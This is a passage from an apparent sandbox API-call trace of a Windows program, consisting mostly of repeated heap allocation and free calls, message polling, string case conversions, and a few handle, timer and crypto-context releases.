lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0261.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0261.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0261.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0261.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0261.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0261.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0261.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0261.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0261.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0261.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0261.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0261.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0261.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0261.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0261.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0261.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0261.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0261.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0261.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0261.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0261.595] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.595] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.595] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0261.595] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0261.595] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0261.595] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0261.595] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0261.595] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.596] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.596] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.596] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.596] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.596] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.596] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0261.596] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.596] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0261.596] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.596] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.596] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.596] CryptReleaseContext (hProv=0xad2be8, dwFlags=0x0) returned 1 [0261.596] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.596] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.596] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 1 [0261.597] TranslateMessage (lpMsg=0x8bf140) returned 0 [0261.597] DispatchMessageW (lpMsg=0x8bf140) returned 0x0 [0261.597] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0261.597] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0261.597] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0261.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0261.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0261.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0261.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0261.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0261.598] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0261.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0261.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0261.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0261.598] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0261.598] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0261.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0261.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0261.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0261.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0261.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0261.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0261.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0261.599] FreeLibrary (hLibModule=0x74d40000) returned 1 [0261.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0261.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.599] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.599] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0261.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0261.599] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0261.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0261.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0261.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0261.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0261.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0261.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0261.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0261.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0261.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0261.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0261.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0261.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0261.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b70 [0261.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0261.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0261.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0261.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0261.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0261.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0261.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0261.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0261.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0261.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0261.600] CloseHandle (hObject=0x268) returned 1 [0261.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0261.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0261.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0261.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0261.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0261.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0261.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0261.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0261.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0261.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0261.603] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0261.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0261.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0261.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0261.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0261.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0261.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0261.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0261.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0261.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0261.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0261.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0261.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0261.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0261.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d50 [0261.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0261.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0261.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0261.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0261.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0261.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0261.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0261.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.604] CloseHandle (hObject=0x294) returned 1 [0261.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0261.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0261.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0261.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0261.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0261.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0261.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0261.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0261.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0261.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0261.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0261.938] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0261.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0261.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0261.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0261.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0261.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0261.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0261.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0261.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0261.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0261.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0261.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0261.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0261.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0261.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0261.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0261.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0261.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0261.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0261.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0261.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | 